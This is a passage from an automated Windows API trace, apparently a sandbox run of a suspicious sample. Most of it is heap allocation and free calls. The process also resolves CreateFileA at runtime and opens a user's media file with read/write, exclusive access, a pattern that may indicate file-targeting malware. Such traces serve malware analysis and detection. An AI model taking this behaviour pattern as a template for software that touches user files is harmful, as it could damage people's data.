out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.057] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8897c0 [0039.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8897c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.057] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0039.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8897c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.057] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4a) returned 0x7f36e0 [0039.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", cchWideChar=74, lpMultiByteStr=0x7f36e0, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", lpUsedDefaultChar=0x0) returned 74 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.058] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\thua2jefihtofcp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x94) returned 0x7c5448 [0039.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=74, lpWideCharStr=0x7c5448, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a") returned 74 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.060] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.062] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.062] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 